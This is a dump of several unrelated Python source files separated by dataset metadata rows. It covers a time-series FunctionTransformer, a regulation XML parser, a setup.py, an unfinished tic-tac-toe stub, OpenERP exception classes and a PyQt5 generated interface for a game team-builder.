"handles-missing-data": True,
"fit-in-transform": False,
}
def __init__(
self,
func=None,
inverse_func=None,
*,
check_inverse=True,
kw_args=None,
inv_kw_args=None,
):
self.func = func
self.inverse_func = inverse_func
self.check_inverse = check_inverse
self.kw_args = kw_args
self.inv_kw_args = inv_kw_args
super(FunctionTransformer, self).__init__()
def _check_inverse_transform(self, Z):
"""Check that func and inverse_func are each other's inverse."""
Z_round_trip = self.inverse_func(self.func(Z))
if not np.allclose(Z_round_trip, Z, equal_nan=True):
raise UserWarning(
"The provided functions are not strictly"
" inverse of each other. If you are sure you"
" want to proceed regardless, set"
" 'check_inverse=False'."
)
def fit(self, Z, X=None):
"""Fit data.
Parameters
----------
Z : pd.Series / pd.DataFrame
Series / DataFrame to fit.
X : pd.DataFrame, optional (default=None)
Exogenous data used in transformation.
Returns
-------
self
"""
if self.check_inverse and not (self.func is None or self.inverse_func is None):
self._check_inverse_transform(Z)
self._is_fitted = True
return self
def transform(self, Z, X=None):
"""Transform data.
Parameters
----------
Z : pd.Series / pd.DataFrame
Series / DataFrame to transform.
X : pd.DataFrame, optional (default=None)
Exogenous data used in transformation.
Returns
-------
Zt : pd.Series / pd.DataFrame
Transformed data.
"""
self.check_is_fitted()
Z = check_series(Z)
return self._apply_function(Z, func=self.func, kw_args=self.kw_args)
def inverse_transform(self, Z, X=None):
"""Inverse transform data.
Parameters
----------
Z : pd.Series / pd.DataFrame
Series / DataFrame to transform.
X : pd.DataFrame, optional (default=None)
Exogenous data used in transformation.
Returns
-------
Zt : pd.Series / pd.DataFrame
Inverse transformed data.
"""
self.check_is_fitted()
Z = check_series(Z)
return self._apply_function(Z, func=self.inverse_func, kw_args=self.inv_kw_args)
def _apply_function(self, Z, func=None, kw_args=None):
if func is None:
func = _identity
return func(Z, **(kw_args if kw_args else {}))
| 33.553571
| 88
| 0.631896
| 5,244
| 0.930282
| 0
| 0
| 0
| 0
| 0
| 0
| 3,841
| 0.681391
|
fbf4288218731b27d1646ee39344ec7cc83f8d4a
| 13,963
|
py
|
Python
|
regparser/tree/xml_parser/reg_text.py
|
cfpb/regulations-parser
|
9b6e1ab2dbec93a915eb6da9a2d88c723b9ac424
|
[
"CC0-1.0"
] | 36
|
2015-01-05T21:17:36.000Z
|
2020-04-28T21:02:55.000Z
|
regparser/tree/xml_parser/reg_text.py
|
DalavanCloud/regulations-parser
|
9b6e1ab2dbec93a915eb6da9a2d88c723b9ac424
|
[
"CC0-1.0"
] | 49
|
2015-01-28T15:54:25.000Z
|
2018-08-20T20:20:08.000Z
|
regparser/tree/xml_parser/reg_text.py
|
DalavanCloud/regulations-parser
|
9b6e1ab2dbec93a915eb6da9a2d88c723b9ac424
|
[
"CC0-1.0"
] | 23
|
2015-01-28T15:34:18.000Z
|
2021-02-20T10:53:34.000Z
|
# vim: set encoding=utf-8
import re
from lxml import etree
import logging
from regparser import content
from regparser.tree.depth import heuristics, rules, markers as mtypes
from regparser.tree.depth.derive import derive_depths
from regparser.tree.struct import Node
from regparser.tree.paragraph import p_level_of
from regparser.tree.xml_parser.appendices import build_non_reg_text
from regparser.tree import reg_text
from regparser.tree.xml_parser import tree_utils
from settings import PARAGRAPH_HIERARCHY
def get_reg_part(reg_doc):
"""
Depending on source, the CFR part number exists in different places. Fetch
it, wherever it is.
"""
potential_parts = []
potential_parts.extend(
# FR notice
node.attrib['PART'] for node in reg_doc.xpath('//REGTEXT'))
potential_parts.extend(
# e-CFR XML, under PART/EAR
node.text.replace('Pt.', '').strip()
for node in reg_doc.xpath('//PART/EAR')
if 'Pt.' in node.text)
potential_parts.extend(
# e-CFR XML, under FDSYS/HEADING
node.text.replace('PART', '').strip()
for node in reg_doc.xpath('//FDSYS/HEADING')
if 'PART' in node.text)
potential_parts.extend(
# e-CFR XML, under FDSYS/GRANULENUM
node.text.strip() for node in reg_doc.xpath('//FDSYS/GRANULENUM'))
potential_parts = [p for p in potential_parts if p.strip()]
if potential_parts:
return potential_parts[0]
def get_title(reg_doc):
""" Extract the title of the regulation. """
parent = reg_doc.xpath('//PART/HD')[0]
title = parent.text
return title
def preprocess_xml(xml):
"""This transforms the read XML through macros. Each macro consists of
an xpath and a replacement xml string"""
for path, replacement in content.Macros():
replacement = etree.fromstring('<ROOT>' + replacement + '</ROOT>')
for node in xml.xpath(path):
parent = node.getparent()
idx = parent.index(node)
parent.remove(node)
for repl in replacement:
parent.insert(idx, repl)
idx += 1
def build_tree(reg_xml):
if isinstance(reg_xml, str) or isinstance(reg_xml, unicode):
doc = etree.fromstring(reg_xml)
else:
doc = reg_xml
preprocess_xml(doc)
reg_part = get_reg_part(doc)
title = get_title(doc)
tree = Node("", [], [reg_part], title)
part = doc.xpath('//PART')[0]
subpart_xmls = [c for c in part.getchildren() if c.tag == 'SUBPART']
if len(subpart_xmls) > 0:
subparts = [build_subpart(reg_part, s) for s in subpart_xmls]
tree.children = subparts
else:
section_xmls = [c for c in part.getchildren() if c.tag == 'SECTION']
sections = []
for section_xml in section_xmls:
sections.extend(build_from_section(reg_part, section_xml))
empty_part = reg_text.build_empty_part(reg_part)
empty_part.children = sections
tree.children = [empty_part]
non_reg_sections = build_non_reg_text(doc, reg_part)
tree.children += non_reg_sections
return tree
def get_subpart_title(subpart_xml):
hds = subpart_xml.xpath('./HD|./RESERVED')
return [hd.text for hd in hds][0]
def build_subpart(reg_part, subpart_xml):
subpart_title = get_subpart_title(subpart_xml)
subpart = reg_text.build_subpart(subpart_title, reg_part)
sections = []
for ch in subpart_xml.getchildren():
if ch.tag == 'SECTION':
sections.extend(build_from_section(reg_part, ch))
subpart.children = sections
return subpart
# @profile
def get_markers(text):
""" Extract all the paragraph markers from text. Do some checks on the
collapsed markers."""
markers = tree_utils.get_paragraph_markers(text)
collapsed_markers = tree_utils.get_collapsed_markers(text)
# Check that the collapsed markers make sense (i.e. are at least one
# level below the initial marker)
if markers and collapsed_markers:
initial_marker_levels = p_level_of(markers[-1])
final_collapsed_markers = []
for collapsed_marker in collapsed_markers:
collapsed_marker_levels = p_level_of(collapsed_marker)
if any(c > f for f in initial_marker_levels
for c in collapsed_marker_levels):
final_collapsed_markers.append(collapsed_marker)
collapsed_markers = final_collapsed_markers
markers_list = [m for m in markers] + [m for m in collapsed_markers]
return markers_list
def get_markers_and_text(node, markers_list):
node_text = tree_utils.get_node_text(node, add_spaces=True)
text_with_tags = tree_utils.get_node_text_tags_preserved(node)
if len(markers_list) > 1:
actual_markers = ['(%s)' % m for m in markers_list]
plain_markers = [m.replace('<E T="03">', '').replace('</E>', '')
for m in actual_markers]
node_texts = tree_utils.split_text(node_text, plain_markers)
tagged_texts = tree_utils.split_text(text_with_tags, actual_markers)
node_text_list = zip(node_texts, tagged_texts)
elif markers_list:
node_text_list = [(node_text, text_with_tags)]
else:
node_text_list = [('', '')]
return zip(markers_list, node_text_list)
def next_marker(xml_node, remaining_markers):
"""Try to determine the marker following the current xml_node. Remaining
markers is a list of other marks *within* the xml_node. May return
None"""
# More markers in this xml node
if remaining_markers:
return remaining_markers[0][0]
# Check the next xml node; skip over stars
sib = xml_node.getnext()
while sib is not None and sib.tag in ('STARS', 'PRTPAGE'):
sib = sib.getnext()
if sib is not None:
next_text = tree_utils.get_node_text(sib)
next_markers = get_markers(next_text)
if next_markers:
return next_markers[0]
def build_from_section(reg_part, section_xml):
section_texts = []
nodes = []
section_no = section_xml.xpath('SECTNO')[0].text
section_no_without_marker = re.search('[0-9]+\.[0-9]+',
section_no).group(0)
subject_xml = section_xml.xpath('SUBJECT')
if not subject_xml:
subject_xml = section_xml.xpath('RESERVED')
subject_text = subject_xml[0].text
manual_hierarchy = []
if (reg_part in PARAGRAPH_HIERARCHY
and section_no_without_marker in PARAGRAPH_HIERARCHY[reg_part]):
manual_hierarchy = PARAGRAPH_HIERARCHY[reg_part][
section_no_without_marker]
# Collect paragraph markers and section text (intro text for the
# section)
i = 0
children = [ch for ch in section_xml.getchildren()
if ch.tag in ['P', 'STARS']]
for ch in children:
text = tree_utils.get_node_text(ch, add_spaces=True)
tagged_text = tree_utils.get_node_text_tags_preserved(ch)
markers_list = get_markers(tagged_text.strip())
# If the child has a 'DEPTH' attribute, we're in manual
# hierarchy mode, just constructed from the XML instead of
# specified in configuration.
# This presumes that every child in the section has DEPTH
# specified, if not, things will break in and around
# derive_depths below.
if ch.get("depth") is not None:
manual_hierarchy.append(int(ch.get("depth")))
if ch.tag == 'STARS':
nodes.append(Node(label=[mtypes.STARS_TAG]))
elif not markers_list and manual_hierarchy:
# is this a bunch of definitions that don't have numbers next to
# them?
if len(nodes) > 0:
if (subject_text.find('Definitions.') > -1
or nodes[-1].text.find(
'For the purposes of this section')):
# TODO: create a grammar for definitions
if text.find('means') > -1:
def_marker = text.split('means')[0].strip().split()
def_marker = ''.join([word[0].upper() + word[1:]
for word in def_marker])
elif text.find('shall have the same meaning') > -1:
def_marker = text.split('shall')[0].strip().split()
def_marker = ''.join([word[0].upper() + word[1:]
for word in def_marker])
else:
def_marker = 'def{0}'.format(i)
i += 1
n = Node(text, label=[def_marker], source_xml=ch)
n.tagged_text = tagged_text
nodes.append(n)
else:
section_texts.append((text, tagged_text))
else:
if len(children) > 1:
def_marker = 'def{0}'.format(i)
n = Node(text, [], [def_marker], source_xml=ch)
n.tagged_text = tagged_text
i += 1
nodes.append(n)
else:
# this is the only node around
section_texts.append((text, tagged_text))
elif not markers_list and not manual_hierarchy:
# No manual heirarchy specified, append to the section.
section_texts.append((text, tagged_text))
else:
for m, node_text in get_markers_and_text(ch, markers_list):
n = Node(node_text[0], [], [m], source_xml=ch)
n.tagged_text = unicode(node_text[1])
nodes.append(n)
if node_text[0].endswith('* * *'):
nodes.append(Node(label=[mtypes.INLINE_STARS]))
# Trailing stars don't matter; slightly more efficient to ignore them
while nodes and nodes[-1].label[0] in mtypes.stars:
nodes = nodes[:-1]
m_stack = tree_utils.NodeStack()
# Use constraint programming to figure out possible depth assignments
if not manual_hierarchy:
depths = derive_depths(
[node.label[0] for node in nodes],
[rules.depth_type_order([mtypes.lower, mtypes.ints, mtypes.roman,
mtypes.upper, mtypes.em_ints,
mtypes.em_roman])])
if not manual_hierarchy and depths:
# Find the assignment which violates the least of our heuristics
depths = heuristics.prefer_multiple_children(depths, 0.5)
depths = sorted(depths, key=lambda d: d.weight, reverse=True)
depths = depths[0]
for node, par in zip(nodes, depths):
if par.typ != mtypes.stars:
last = m_stack.peek()
node.label = [l.replace('<E T="03">', '').replace('</E>', '')
for l in node.label]
if len(last) == 0:
m_stack.push_last((1 + par.depth, node))
else:
m_stack.add(1 + par.depth, node)
elif nodes and manual_hierarchy:
logging.warning('Using manual depth hierarchy.')
depths = manual_hierarchy
if len(nodes) == len(depths):
for node, spec in zip(nodes, depths):
if isinstance(spec, int):
depth = spec
elif isinstance(spec, tuple):
depth, marker = spec
node.marker = marker
last = m_stack.peek()
node.label = [l.replace('<E T="03">', '').replace('</E>', '')
for l in node.label]
if len(last) == 0:
m_stack.push_last((1 + depth, node))
else:
m_stack.add(1 + depth, node)
else:
logging.error('Manual hierarchy length does not match node '
'list length! ({0} nodes but {1} provided, '
'{2})'.format(
len(nodes),
len(depths),
[x.label[0] for x in nodes]))
elif nodes and not manual_hierarchy:
logging.warning(
'Could not determine depth when parsing {0}:\n{1}'.format(
section_no_without_marker, [node.label[0] for node in nodes]))
for node in nodes:
last = m_stack.peek()
node.label = [l.replace('<E T="03">', '').replace('</E>', '')
for l in node.label]
if len(last) == 0:
m_stack.push_last((3, node))
else:
m_stack.add(3, node)
nodes = []
section_nums = []
for match in re.finditer(r'%s\.(\d+)' % reg_part, section_no):
section_nums.append(int(match.group(1)))
# Span of section numbers
if u'§§' == section_no[:2] and '-' in section_no:
first, last = section_nums
section_nums = []
for i in range(first, last + 1):
section_nums.append(i)
for section_number in section_nums:
section_number = str(section_number)
plain_sect_texts = [s[0] for s in section_texts]
tagged_sect_texts = [s[1] for s in section_texts]
section_title = u"§ " + reg_part + "." + section_number
if subject_text:
section_title += " " + subject_text
section_text = ' '.join([section_xml.text] + plain_sect_texts)
tagged_section_text = ' '.join([section_xml.text] + tagged_sect_texts)
sect_node = Node(section_text, label=[reg_part, section_number],
title=section_title)
sect_node.tagged_text = tagged_section_text
m_stack.add_to_bottom((1, sect_node))
while m_stack.size() > 1:
m_stack.unwind()
nodes.append(m_stack.pop()[0][1])
return nodes
| 37.840108
| 78
| 0.587911
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,321
| 0.166189
|
fbf49444e0f4679af981bbaa8faf8266920ca318
| 1,216
|
py
|
Python
|
setup.py
|
mark-dawn/stytra
|
be1d5be0a44aeb685d475240d056ef7adf60ed06
|
[
"MIT"
] | null | null | null |
setup.py
|
mark-dawn/stytra
|
be1d5be0a44aeb685d475240d056ef7adf60ed06
|
[
"MIT"
] | null | null | null |
setup.py
|
mark-dawn/stytra
|
be1d5be0a44aeb685d475240d056ef7adf60ed06
|
[
"MIT"
] | null | null | null |
from distutils.core import setup
from setuptools import find_packages
setup(
name="stytra",
version="0.1",
author="Vilim Stih, Luigi Petrucco @portugueslab",
author_email="vilim@neuro.mpg.de",
license="MIT",
packages=find_packages(),
install_requires=[
"pyqtgraph>=0.10.0",
"numpy",
"numba",
"matplotlib",
"pandas",
"qdarkstyle",
"qimage2ndarray",
"deepdish",
"param",
"pims",
"GitPython",
"pymongo",
"colorspacious",
"arrayqueues",
],
classifiers=[
"Development Status :: 3 - Alpha",
"Intended Audience :: Science/Research",
# Pick your license as you wish (should match "license" above)
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
],
keywords="tracking processing",
description="A modular package to control stimulation and track behaviour in zebrafish experiments.",
project_urls={
"Source": "https://github.com/portugueslab/stytra",
"Tracker": "https://github.com/portugueslab/stytra/issues",
},
)
| 28.27907
| 105
| 0.591283
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 697
| 0.573191
|
fbf4c0c322e799620006a7ec56b567282c3ba0ca
| 226
|
py
|
Python
|
checkTicTacToe/checkTicTacToe.py
|
nate-ar-williams/coding-questions
|
24baa901a786e6e2c4e8ea823a26416bc51e1f6a
|
[
"MIT"
] | null | null | null |
checkTicTacToe/checkTicTacToe.py
|
nate-ar-williams/coding-questions
|
24baa901a786e6e2c4e8ea823a26416bc51e1f6a
|
[
"MIT"
] | null | null | null |
checkTicTacToe/checkTicTacToe.py
|
nate-ar-williams/coding-questions
|
24baa901a786e6e2c4e8ea823a26416bc51e1f6a
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
# let board be 3x3 bool array
def isWin(board):
start = board[0][0]
win = False
next = [(0, 1), (1, 1), (1, 0)]
while(!win):
while
return win
def main():
pass
if __name__ == '__main__':
main()
| 12.555556
| 32
| 0.588496
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 57
| 0.252212
|
fbf52c7f3a9bab66d56f2bccbaf8974ecb5420d3
| 2,138
|
py
|
Python
|
openerp/exceptions.py
|
ntiufalara/openerp7
|
903800da0644ec0dd9c1dcd34205541f84d45fe4
|
[
"MIT"
] | 3
|
2016-01-29T14:39:49.000Z
|
2018-12-29T22:42:00.000Z
|
openerp/exceptions.py
|
ntiufalara/openerp7
|
903800da0644ec0dd9c1dcd34205541f84d45fe4
|
[
"MIT"
] | 2
|
2016-03-23T14:29:41.000Z
|
2017-02-20T17:11:30.000Z
|
openerp/exceptions.py
|
ntiufalara/openerp7
|
903800da0644ec0dd9c1dcd34205541f84d45fe4
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2011 OpenERP s.a. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
""" OpenERP core exceptions.
This module defines a few exception types. Those types are understood by the
RPC layer. Any other exception type bubbling until the RPC layer will be
treated as a 'Server error'.
"""
class Warning(Exception):
pass
class AccessDenied(Exception):
""" Login/password error. No message, no traceback. """
def __init__(self):
super(AccessDenied, self).__init__('Access denied.')
self.traceback = ('', '', '')
class AccessError(Exception):
""" Access rights error. """
class DeferredException(Exception):
""" Exception object holding a traceback for asynchronous reporting.
Some RPC calls (database creation and report generation) happen with
an initial request followed by multiple, polling requests. This class
is used to store the possible exception occuring in the thread serving
the first request, and is then sent to a polling request.
('Traceback' is misleading, this is really a exc_info() triple.)
"""
def __init__(self, msg, tb):
self.message = msg
self.traceback = tb
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| 37.508772
| 78
| 0.658092
| 868
| 0.405987
| 0
| 0
| 0
| 0
| 0
| 0
| 1,774
| 0.829747
|
fbf6f8315c8b89ca91d3b286cb9fd7bfaffd9e47
| 83,653
|
py
|
Python
|
MainUi.py
|
james646-hs/Fgo_teamup
|
f1e5c6f514818b68e9abb9eab3c6103fd000819a
|
[
"MIT"
] | 18
|
2020-05-30T01:41:24.000Z
|
2021-03-04T08:07:35.000Z
|
MainUi.py
|
james646-hs/Fgo_teamup
|
f1e5c6f514818b68e9abb9eab3c6103fd000819a
|
[
"MIT"
] | 1
|
2020-08-13T02:19:42.000Z
|
2020-08-13T02:19:42.000Z
|
MainUi.py
|
james646-hs/Fgo_teamup
|
f1e5c6f514818b68e9abb9eab3c6103fd000819a
|
[
"MIT"
] | 2
|
2020-06-13T18:23:07.000Z
|
2020-08-13T02:08:54.000Z
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'MainUi.ui'
#
# Created by: PyQt5 UI code generator 5.13.0
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.setEnabled(True)
MainWindow.resize(1070, 837)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth())
MainWindow.setSizePolicy(sizePolicy)
MainWindow.setMinimumSize(QtCore.QSize(0, 0))
MainWindow.setMaximumSize(QtCore.QSize(16777215, 16777215))
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.centralwidget)
self.verticalLayout_2.setContentsMargins(5, 10, 5, 5)
self.verticalLayout_2.setSpacing(5)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.groupBox = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox.setTitle("")
self.groupBox.setObjectName("groupBox")
self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.groupBox)
self.verticalLayout_3.setContentsMargins(5, 5, 5, 5)
self.verticalLayout_3.setSpacing(5)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.gridLayout_3 = QtWidgets.QGridLayout()
self.gridLayout_3.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)
self.gridLayout_3.setObjectName("gridLayout_3")
self.label_costume_state_4 = QtWidgets.QLabel(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_costume_state_4.sizePolicy().hasHeightForWidth())
self.label_costume_state_4.setSizePolicy(sizePolicy)
self.label_costume_state_4.setMaximumSize(QtCore.QSize(16777215, 28))
self.label_costume_state_4.setObjectName("label_costume_state_4")
self.gridLayout_3.addWidget(self.label_costume_state_4, 4, 4, 1, 1)
self.label_servant_state_2 = QtWidgets.QLabel(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_servant_state_2.sizePolicy().hasHeightForWidth())
self.label_servant_state_2.setSizePolicy(sizePolicy)
self.label_servant_state_2.setMinimumSize(QtCore.QSize(110, 65))
self.label_servant_state_2.setMaximumSize(QtCore.QSize(16777215, 65))
self.label_servant_state_2.setObjectName("label_servant_state_2")
self.gridLayout_3.addWidget(self.label_servant_state_2, 2, 1, 1, 1)
self.line_7 = QtWidgets.QFrame(self.groupBox)
self.line_7.setFrameShape(QtWidgets.QFrame.VLine)
self.line_7.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_7.setObjectName("line_7")
self.gridLayout_3.addWidget(self.line_7, 0, 7, 1, 1)
self.label_costume_state_1 = QtWidgets.QLabel(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_costume_state_1.sizePolicy().hasHeightForWidth())
self.label_costume_state_1.setSizePolicy(sizePolicy)
self.label_costume_state_1.setMaximumSize(QtCore.QSize(16777212, 28))
self.label_costume_state_1.setObjectName("label_costume_state_1")
self.gridLayout_3.addWidget(self.label_costume_state_1, 4, 0, 1, 1)
self.box_skill_confirm = QtWidgets.QCheckBox(self.groupBox)
self.box_skill_confirm.setObjectName("box_skill_confirm")
self.gridLayout_3.addWidget(self.box_skill_confirm, 4, 8, 1, 1)
self.horizontalLayout_29 = QtWidgets.QHBoxLayout()
self.horizontalLayout_29.setObjectName("horizontalLayout_29")
self.btn_select_servant_5 = QtWidgets.QPushButton(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btn_select_servant_5.sizePolicy().hasHeightForWidth())
self.btn_select_servant_5.setSizePolicy(sizePolicy)
self.btn_select_servant_5.setMinimumSize(QtCore.QSize(92, 100))
self.btn_select_servant_5.setMaximumSize(QtCore.QSize(92, 100))
self.btn_select_servant_5.setText("")
self.btn_select_servant_5.setIconSize(QtCore.QSize(92, 100))
self.btn_select_servant_5.setObjectName("btn_select_servant_5")
self.horizontalLayout_29.addWidget(self.btn_select_servant_5)
self.gridLayout_3.addLayout(self.horizontalLayout_29, 0, 5, 1, 1)
self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.label = QtWidgets.QLabel(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label.sizePolicy().hasHeightForWidth())
self.label.setSizePolicy(sizePolicy)
self.label.setObjectName("label")
self.horizontalLayout_3.addWidget(self.label)
self.spinbox_required_prob = QtWidgets.QSpinBox(self.groupBox)
self.spinbox_required_prob.setMaximum(100)
self.spinbox_required_prob.setProperty("value", 100)
self.spinbox_required_prob.setObjectName("spinbox_required_prob")
self.horizontalLayout_3.addWidget(self.spinbox_required_prob)
self.gridLayout_3.addLayout(self.horizontalLayout_3, 3, 8, 1, 1)
self.horizontalLayout_24 = QtWidgets.QHBoxLayout()
self.horizontalLayout_24.setObjectName("horizontalLayout_24")
self.btn_select_servant_1 = QtWidgets.QPushButton(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btn_select_servant_1.sizePolicy().hasHeightForWidth())
self.btn_select_servant_1.setSizePolicy(sizePolicy)
self.btn_select_servant_1.setMinimumSize(QtCore.QSize(92, 100))
self.btn_select_servant_1.setMaximumSize(QtCore.QSize(92, 100))
self.btn_select_servant_1.setText("")
self.btn_select_servant_1.setIconSize(QtCore.QSize(92, 100))
self.btn_select_servant_1.setObjectName("btn_select_servant_1")
self.horizontalLayout_24.addWidget(self.btn_select_servant_1)
self.gridLayout_3.addLayout(self.horizontalLayout_24, 0, 0, 1, 1)
self.label_costume_state_5 = QtWidgets.QLabel(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_costume_state_5.sizePolicy().hasHeightForWidth())
self.label_costume_state_5.setSizePolicy(sizePolicy)
self.label_costume_state_5.setMaximumSize(QtCore.QSize(16777215, 28))
self.label_costume_state_5.setObjectName("label_costume_state_5")
self.gridLayout_3.addWidget(self.label_costume_state_5, 4, 5, 1, 1)
self.label_costume_state_6 = QtWidgets.QLabel(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_costume_state_6.sizePolicy().hasHeightForWidth())
self.label_costume_state_6.setSizePolicy(sizePolicy)
self.label_costume_state_6.setMaximumSize(QtCore.QSize(16777215, 28))
self.label_costume_state_6.setObjectName("label_costume_state_6")
self.gridLayout_3.addWidget(self.label_costume_state_6, 4, 6, 1, 1)
self.horizontalLayout_26 = QtWidgets.QHBoxLayout()
self.horizontalLayout_26.setObjectName("horizontalLayout_26")
self.btn_select_servant_2 = QtWidgets.QPushButton(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btn_select_servant_2.sizePolicy().hasHeightForWidth())
self.btn_select_servant_2.setSizePolicy(sizePolicy)
self.btn_select_servant_2.setMinimumSize(QtCore.QSize(92, 100))
self.btn_select_servant_2.setMaximumSize(QtCore.QSize(92, 100))
self.btn_select_servant_2.setText("")
self.btn_select_servant_2.setIconSize(QtCore.QSize(92, 100))
self.btn_select_servant_2.setObjectName("btn_select_servant_2")
self.horizontalLayout_26.addWidget(self.btn_select_servant_2)
self.gridLayout_3.addLayout(self.horizontalLayout_26, 0, 1, 1, 1)
self.horizontalLayout_23 = QtWidgets.QHBoxLayout()
self.horizontalLayout_23.setObjectName("horizontalLayout_23")
self.btn_select_master = QtWidgets.QPushButton(self.groupBox)
self.btn_select_master.setMinimumSize(QtCore.QSize(92, 100))
self.btn_select_master.setMaximumSize(QtCore.QSize(92, 100))
self.btn_select_master.setText("")
self.btn_select_master.setIconSize(QtCore.QSize(100, 100))
self.btn_select_master.setObjectName("btn_select_master")
self.horizontalLayout_23.addWidget(self.btn_select_master)
self.gridLayout_3.addLayout(self.horizontalLayout_23, 0, 8, 1, 1)
self.label_servant_state_1 = QtWidgets.QLabel(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_servant_state_1.sizePolicy().hasHeightForWidth())
self.label_servant_state_1.setSizePolicy(sizePolicy)
self.label_servant_state_1.setMinimumSize(QtCore.QSize(110, 65))
self.label_servant_state_1.setMaximumSize(QtCore.QSize(16777215, 65))
self.label_servant_state_1.setObjectName("label_servant_state_1")
self.gridLayout_3.addWidget(self.label_servant_state_1, 2, 0, 1, 1)
self.label_master_state = QtWidgets.QLabel(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_master_state.sizePolicy().hasHeightForWidth())
self.label_master_state.setSizePolicy(sizePolicy)
self.label_master_state.setMinimumSize(QtCore.QSize(0, 0))
self.label_master_state.setMaximumSize(QtCore.QSize(16777215, 28))
self.label_master_state.setObjectName("label_master_state")
self.gridLayout_3.addWidget(self.label_master_state, 2, 8, 1, 1)
self.horizontalLayout_38 = QtWidgets.QHBoxLayout()
self.horizontalLayout_38.setObjectName("horizontalLayout_38")
self.btn_select_costume_3 = QtWidgets.QPushButton(self.groupBox)
self.btn_select_costume_3.setMinimumSize(QtCore.QSize(100, 45))
self.btn_select_costume_3.setMaximumSize(QtCore.QSize(100, 45))
self.btn_select_costume_3.setText("")
self.btn_select_costume_3.setIconSize(QtCore.QSize(100, 150))
self.btn_select_costume_3.setObjectName("btn_select_costume_3")
self.horizontalLayout_38.addWidget(self.btn_select_costume_3)
self.gridLayout_3.addLayout(self.horizontalLayout_38, 3, 2, 1, 1)
self.label_costume_state_2 = QtWidgets.QLabel(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
